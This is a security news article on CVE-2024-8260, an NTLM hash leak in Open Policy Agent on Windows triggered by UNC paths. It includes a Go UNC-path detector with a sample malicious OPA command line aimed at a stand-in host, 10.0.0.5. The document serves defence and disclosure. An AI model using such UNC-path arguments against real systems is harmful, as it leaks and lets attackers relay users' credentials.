Attackers Could Exploit Flaw to Relay Credentials, Compromise Systems
A now-patched security flaw in one of the most popular tools for managing security policies could enable attackers to siphon off sensitive credentials from millions of users.
Security researchers at Tenable uncovered the flaw, CVE-2024-8260, which can expose the NTLM credentials of Windows systems running Styra's Open Policy Agent. Tenable assigned the vulnerability a CVSS score of 6.1, a medium-severity rating.
Styra fixed the issue in OPA v0.68.0. All older versions of OPA running on Windows are vulnerable and should be patched; organizations that deploy the OPA CLI or the OPA Go package on Windows should update to the latest release.
The flaw lets an attacker feed OPA a malicious argument that tricks it into authenticating with a remote server under the attacker's control. During this process, NTLM credentials - the NTLM hash of the logged-in user, not the plaintext password - can be leaked.
The vulnerability is exploited as part of post-compromise activity. An attacker first establishes a foothold on the system, potentially through social engineering such as tricking a user into executing OPA via a malicious file attachment in a phishing email. Once inside, the attacker directs the compromised environment to connect to their server using a Universal Naming Convention path. A UNC path is the standard Windows format for identifying the location of a resource on a network and typically takes the form \\servername\sharename. Because Windows resolves such a path by contacting the named host, the attacker can use a UNC path to make the system attempt to access a malicious server.
To carry out the exploit, the attacker can point OPA at a UNC path in place of a local Rego file. Rego is OPA's policy language, and its rules are normally loaded from files; if the location OPA is told to load policy from is a UNC path, OPA attempts to read it from the attacker's server.
The attacker can also place the UNC path in OPA's command-line interface arguments - the inputs provided when running OPA. Either route makes OPA, and therefore Windows, try to open the remote path, exposing the user's NTLM credentials during the resulting authentication attempt.
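To make the input-validation point concrete, here is an added example, written for this page and not taken from Tenable's advisory or from the OPA project's code, that implements the check a Windows deployment would want in front of OPA: a UNC-path classifier, a scanner for OPA command lines (usable over process-creation telemetry as well as before exec), and a guard for Go programs that embed OPA and hand it policy paths. The function names, the sample command line and the host 10.0.0.5 are constructed for illustration; the path forms recognized follow Windows path syntax. This mitigates the untrusted-path route described above but is not a substitute for updating to v0.68.0 or later.

```go
package main

import (
	"fmt"
	"strings"
)

// IsUNCPath reports whether p is a Windows UNC path, i.e. one whose
// resolution makes the SMB client contact a remote host. Accepted forms:
//   \\server\share\policy.rego   classic UNC
//   //server/share/policy.rego   forward-slash variant (Windows accepts it)
//   \\?\UNC\server\share\...     extended-length UNC
//   \\.\UNC\server\share\...     device-namespace UNC
// Extended-length *local* paths such as \\?\C:\policies\x.rego are not UNC
// and return false.
func IsUNCPath(p string) bool {
	s := strings.ReplaceAll(strings.TrimSpace(p), "/", `\`)
	if !strings.HasPrefix(s, `\\`) {
		return false
	}
	rest := s[2:]
	// \\?\ and \\.\ prefixes are only remote when followed by UNC\
	if strings.HasPrefix(rest, `?\`) || strings.HasPrefix(rest, `.\`) {
		rest = rest[2:]
		if len(rest) < 4 || !strings.EqualFold(rest[:4], `UNC\`) {
			return false
		}
		rest = rest[4:]
	}
	host, _, _ := strings.Cut(rest, `\`)
	// Any non-empty host component is enough to trigger an SMB connection,
	// even without a share name, so treat it as UNC.
	return host != ""
}

// FindUNCArgs scans an OPA command line (as it would appear in a
// process-creation log or just before exec) and returns every argument
// whose value is a UNC path. Both "--data \\host\share" and
// "--data=\\host\share" spellings are handled.
func FindUNCArgs(args []string) []string {
	var hits []string
	for _, a := range args {
		value := a
		if strings.HasPrefix(a, "-") {
			_, v, ok := strings.Cut(a, "=")
			if !ok {
				continue // a bare flag such as -d carries no path itself
			}
			value = v
		}
		if IsUNCPath(value) {
			hits = append(hits, a)
		}
	}
	return hits
}

// RejectUNCPaths is the guard a Go program embedding OPA can run over the
// policy and data paths it is about to hand to the loader (hypothetical
// helper, not part of OPA). It returns an error naming the first remote
// path so the caller can refuse to load anything.
func RejectUNCPaths(paths []string) error {
	for _, p := range paths {
		if IsUNCPath(p) {
			return fmt.Errorf("refusing to load policy from UNC path %q", p)
		}
	}
	return nil
}

func main() {
	// Constructed command line for the demo; 10.0.0.5 is not a real server.
	argv := []string{"opa", "eval", "-d", `\\10.0.0.5\share\policy.rego`,
		"--input", "input.json", "data.example.allow"}
	fmt.Println("UNC arguments:", FindUNCArgs(argv))

	local := []string{`C:\policies\authz.rego`, `\\?\C:\policies\long.rego`}
	fmt.Println("local paths accepted:", RejectUNCPaths(local) == nil)
	fmt.Println("remote path:", RejectUNCPaths([]string{`//10.0.0.5/share/x.rego`}))
}
```

The classifier deliberately lets `\\?\C:\...` through, since that prefix is the long-path form of a local drive, while any `\\host` with a non-empty host is rejected even without a share name, because the connection attempt alone is what forces NTLM authentication. It is a syntactic check on the strings OPA receives: a mapped drive letter that already points at a remote share would not be caught, so the guard complements, rather than replaces, patching and egress filtering of SMB.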
"When a user or application attempts to access a remote share on Windows, it forces the local machine to authenticate to the remote server via NTLM. During this process, the NTLM hash of the local user is sent to the remote server," said Tenable researchers.
"Attackers could relay the leaked authentication or use these credentials to break into other systems."
Exploiting the OPA vulnerability is not straightforward: it requires either local access to the target server or code execution obtained through social engineering or the exploitation of another vulnerability. But the likelihood and ease of exploitation increase significantly if the vulnerable OPA server accepts inputs from users or third parties, particularly if the affected platform is internet-facing.
Many organizations use OPA to enforce security policies across cloud-native applications, which often require dynamic input to function, so OPA servers are likely to accept inputs from users or third parties. In that scenario, attackers may find the vulnerability easier to abuse.